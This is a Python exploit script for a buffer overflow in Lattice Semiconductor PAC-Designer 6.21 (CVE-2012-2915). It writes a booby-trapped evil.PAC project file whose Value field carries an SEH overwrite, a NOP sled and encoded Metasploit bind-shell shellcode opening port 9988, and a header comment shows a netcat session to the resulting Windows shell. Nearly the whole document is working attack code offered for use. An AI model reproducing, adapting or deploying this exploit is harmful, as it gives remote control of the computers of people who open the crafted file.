Lattice Semiconductor PAC-Designer 6.21 Overflow

`#!/usr/bin/python -w  
  
#------------------------------------------------------------------------------------#  
# Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions) #  
# CVE: CVE-2012-2915 #  
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/ #  
# OS: WinXP SP1 #  
# Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm #  
#------------------------------------------------------------------------------------#  
# I didn't dig to deep but it seems portability to other OS builds is not promising #  
# due to SafeSEH and badchars in the application modules. #  
#------------------------------------------------------------------------------------#  
# root@bt:~# nc -nv 192.168.111.130 9988 #  
# (UNKNOWN) [192.168.111.130] 9988 (?) open #  
# Microsoft Windows XP [Version 5.1.2600] #  
# (C) Copyright 1985-2001 Microsoft Corp. #  
# #  
# C:\Documents and Settings\Owner\Desktop> #  
#------------------------------------------------------------------------------------#  
  
filename="evil.PAC"  
  
PAC1 = """<?xml version="1.0"?>  
  
<PacDesignData>  
  
<DocFmtVersion>1</DocFmtVersion>  
<DeviceType>ispPAC-CLK5410D</DeviceType>  
  
<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>  
  
<SummaryInformation>  
<Title>Oops..</Title>  
<Author>b33f</Author>  
</SummaryInformation>  
  
<SymbolicSchematicData>  
<Symbol>  
<SymKey>153</SymKey>  
<NameText>Profile 0 Ref Frequency</NameText>  
<Value>"""  
  
#------------------------------------------------------------------------------------#  
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c #  
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1) #  
#------------------------------------------------------------------------------------#  
shellcode = (  
"\x89\xe3\xd9\xd0\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"  
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"  
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"  
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"  
"\x79\x6c\x59\x78\x4e\x69\x35\x50\x35\x50\x57\x70\x53\x50\x6b"  
"\x39\x6a\x45\x35\x61\x38\x52\x73\x54\x4c\x4b\x36\x32\x70\x30"  
"\x4e\x6b\x56\x32\x36\x6c\x6e\x6b\x72\x72\x32\x34\x6e\x6b\x33"  
"\x42\x66\x48\x56\x6f\x38\x37\x61\x5a\x45\x76\x56\x51\x59\x6f"  
"\x45\x61\x59\x50\x6e\x4c\x67\x4c\x73\x51\x73\x4c\x74\x42\x46"  
"\x4c\x45\x70\x4b\x71\x58\x4f\x54\x4d\x63\x31\x69\x57\x78\x62"  
"\x7a\x50\x46\x32\x63\x67\x6e\x6b\x70\x52\x66\x70\x4e\x6b\x30"  
"\x42\x47\x4c\x76\x61\x6e\x30\x4e\x6b\x57\x30\x73\x48\x4b\x35"  
"\x69\x50\x72\x54\x53\x7a\x75\x51\x6e\x30\x36\x30\x6e\x6b\x72"  
"\x68\x55\x48\x6e\x6b\x30\x58\x31\x30\x65\x51\x5a\x73\x7a\x43"  
"\x75\x6c\x72\x69\x6c\x4b\x64\x74\x4c\x4b\x45\x51\x6a\x76\x74"  
"\x71\x79\x6f\x76\x51\x4f\x30\x6c\x6c\x69\x51\x6a\x6f\x64\x4d"  
"\x35\x51\x69\x57\x45\x68\x4d\x30\x74\x35\x6b\x44\x75\x53\x73"  
"\x4d\x49\x68\x67\x4b\x61\x6d\x45\x74\x30\x75\x69\x72\x32\x78"  
"\x4c\x4b\x51\x48\x36\x44\x55\x51\x38\x53\x51\x76\x6c\x4b\x66"  
"\x6c\x42\x6b\x6c\x4b\x66\x38\x37\x6c\x66\x61\x38\x53\x4e\x6b"  
"\x63\x34\x6c\x4b\x67\x71\x48\x50\x6d\x59\x72\x64\x56\x44\x74"  
"\x64\x33\x6b\x31\x4b\x53\x51\x66\x39\x62\x7a\x72\x71\x59\x6f"  
"\x4b\x50\x33\x68\x31\x4f\x62\x7a\x4c\x4b\x35\x42\x4a\x4b\x6d"  
"\x56\x31\x4d\x42\x48\x36\x53\x30\x32\x57\x70\x33\x30\x42\x48"  
"\x71\x67\x52\x53\x57\x42\x43\x6f\x71\x44\x42\x48\x50\x4c\x43"  
"\x47\x71\x36\x53\x37\x79\x6f\x58\x55\x58\x38\x6a\x30\x56\x61"  
"\x65\x50\x73\x30\x76\x49\x6a\x64\x43\x64\x30\x50\x52\x48\x47"  
"\x59\x4d\x50\x30\x6b\x57\x70\x39\x6f\x6e\x35\x72\x70\x76\x30"  
"\x52\x70\x36\x30\x31\x50\x36\x30\x43\x70\x76\x30\x32\x48\x69"  
"\x7a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x79\x45\x6e\x69\x4a\x67"  
"\x34\x71\x49\x4b\x62\x73\x43\x58\x63\x32\x77\x70\x56\x47\x76"  
"\x64\x6d\x59\x79\x76\x32\x4a\x56\x70\x32\x76\x61\x47\x63\x58"  
"\x38\x42\x4b\x6b\x67\x47\x53\x57\x59\x6f\x4e\x35\x31\x43\x76"  
"\x37\x33\x58\x48\x37\x69\x79\x35\x68\x69\x6f\x79\x6f\x6e\x35"  
"\x30\x53\x31\x43\x63\x67\x35\x38\x51\x64\x38\x6c\x75\x6b\x49"  
"\x71\x59\x6f\x79\x45\x43\x67\x6c\x49\x5a\x67\x42\x48\x52\x55"  
"\x30\x6e\x70\x4d\x61\x71\x79\x6f\x58\x55\x32\x48\x33\x53\x30"  
"\x6d\x33\x54\x43\x30\x4e\x69\x49\x73\x56\x37\x33\x67\x62\x77"  
"\x54\x71\x59\x66\x71\x7a\x57\x62\x32\x79\x36\x36\x38\x62\x6b"  
"\x4d\x61\x76\x58\x47\x51\x54\x74\x64\x57\x4c\x75\x51\x55\x51"  
"\x6e\x6d\x77\x34\x46\x44\x44\x50\x68\x46\x37\x70\x50\x44\x31"  
"\x44\x76\x30\x72\x76\x61\x46\x72\x76\x50\x46\x43\x66\x72\x6e"  
"\x31\x46\x76\x36\x71\x43\x30\x56\x33\x58\x43\x49\x38\x4c\x47"  
"\x4f\x6c\x46\x59\x6f\x6b\x65\x4f\x79\x79\x70\x32\x6e\x32\x76"  
"\x57\x36\x39\x6f\x70\x30\x43\x58\x45\x58\x4b\x37\x35\x4d\x73"  
"\x50\x79\x6f\x6e\x35\x4d\x6b\x6c\x30\x6c\x75\x79\x32\x73\x66"  
"\x62\x48\x6f\x56\x4c\x55\x4d\x6d\x6d\x4d\x39\x6f\x6a\x75\x65"  
"\x6c\x47\x76\x73\x4c\x64\x4a\x6d\x50\x79\x6b\x49\x70\x33\x45"  
"\x54\x45\x4f\x4b\x63\x77\x47\x63\x33\x42\x72\x4f\x51\x7a\x37"  
"\x70\x30\x53\x79\x6f\x68\x55\x41\x41")  
  
#------------------------------------------------------------------------------------#  
# SEH: 0x77512879 : pop esi # pop ecx # ret - SHELL32.dll #  
# nSEH: \xEB\x05 #  
#------------------------------------------------------------------------------------#  
b00m = "\x90"*20 + shellcode  
payload = "A"*98 + "\xEB\x05\x79\x28\x51\x77" + b00m + "C"*(5000-len(b00m))  
  
PAC2 = """</Value>  
</Symbol>  
</SymbolicSchematicData>  
  
</PacDesignData>"""  
  
buffer = PAC1 + payload + PAC2  
  
textfile = open(filename , 'w')  
textfile.write(buffer)  
textfile.close()  
  
`